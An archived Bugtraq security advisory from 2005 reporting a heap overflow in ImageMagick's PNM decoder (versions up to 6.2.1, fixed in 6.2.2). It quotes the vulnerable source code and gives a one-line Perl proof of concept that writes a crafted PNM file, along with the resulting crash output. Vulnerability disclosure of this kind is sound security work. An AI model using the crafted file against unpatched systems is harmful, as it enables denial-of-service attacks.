[Overflow.pl] ImageMagick ReadPNMImage() Heap Overflow

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [Overflow.pl] ImageMagick ReadPNMImage() Heap Overflow
From: Damian Put <pucik@xxxxxxxxxxx>
Date: Mon, 25 Apr 2005 07:29:40 +0200
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: Overflow.pl

Overflow Security Advisory #3

ImageMagick ReadPNMImage() Heap Overflow

Vendor: ImageMagick (http://www.imagemagick.org)
Affected version: 6.x up to and including 6.2.1
Vendor status: Fixed version released (6.2.2)

Author: Damian Put <pucik@xxxxxxxxxxx>
URL: http://www.overflow.pl/adv/imheapoverflow.txt
Date: 25.04.2005

1. Background

ImageMagick is a free software suite to create, edit, and compose bitmap images.
 It can read, convert and write images in a large variety of formats.

http://www.imagemagick.org


2. Description

Remote exploitation of a heap overflow vulnerability could allow execution of
arbitrary code or couse denial of service.

A heap overflow exists in ReadPNMImage() function, that is used to decode
a PNM image files. The vulnerable code is:


coders/pnm.c:

static Image *ReadPNMImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
...
    if ((format == '1') || (format == '4'))
      max_value=1;  /* bitmap */
    else
      max_value=PNMInteger(image,10);
    image->depth=max_value < 256 ? 8UL : QuantumDepth;
    if ((format != '3') && (format != '6'))
      {
        image->storage_class=PseudoClass;
        image->colors=(unsigned long) (max_value >= MaxColormapSize ?
          MaxColormapSize : max_value+1);
      }
...
        if (AllocateImageColormap(image,image->colors) == MagickFalse)
          ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
        if (format == '7')
          {
            /*
              Initialize 332 colormap.
            */
            i=0;
            for (pixel.red=0; pixel.red < 8; pixel.red++)
              for (pixel.green=0; pixel.green < 8; pixel.green++)
                for (pixel.blue=0; pixel.blue < 4; pixel.blue++)
                {
                  image->colormap[i].red=ScaleXToQuantum(pixel.red,0x07);
                  image->colormap[i].green=ScaleXToQuantum(pixel.green,0x07);
                  image->colormap[i].blue=ScaleXToQuantum(pixel.blue,0x03);
                  i++;
                }
          }
...

We can manipulate with image->colors value, becouse it`s atributted to 
"max_value" 
or MaxColormapSize variable. Allocation of memory for image->colormap is based 
on
image->colors variable (AllocateImageColormap() function). If value of 
"image->colors"
is for example 1, we allocate only 1*sizeof(PixelPacket) bytes of memory. Next, 
when
format of PNM file is "7", image->colormap buffer is initialized by 332 
colormaps.
If image->colors*sizeof(PixelPacket) bytes are not enought for it, heap 
structures are
overflowed. We cannot control contents of this buffer, so execute of arbitrary 
code is
very difficult or imposible, but we can crash it in easy way.


3. PoC

Example crafted PNM file:

bash$ perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm

We can test vulnerability with "mogrify" - standard ImageMagick utility:

bash$ mogrify vuln.pnm
*** glibc detected *** malloc(): memory corruption: 0x08701198 ***
Przerwane (core dumped)
bash$

Prev by Date: E-Cart v1.1 Remote Command Execution Vulnerability
Next by Date: MailEnable HTTPS Buffer Overflow [x0n3-h4ck]
Previous by thread: E-Cart v1.1 Remote Command Execution Vulnerability
Next by thread: MailEnable HTTPS Buffer Overflow [x0n3-h4ck]
Index(es):
- Date
- Thread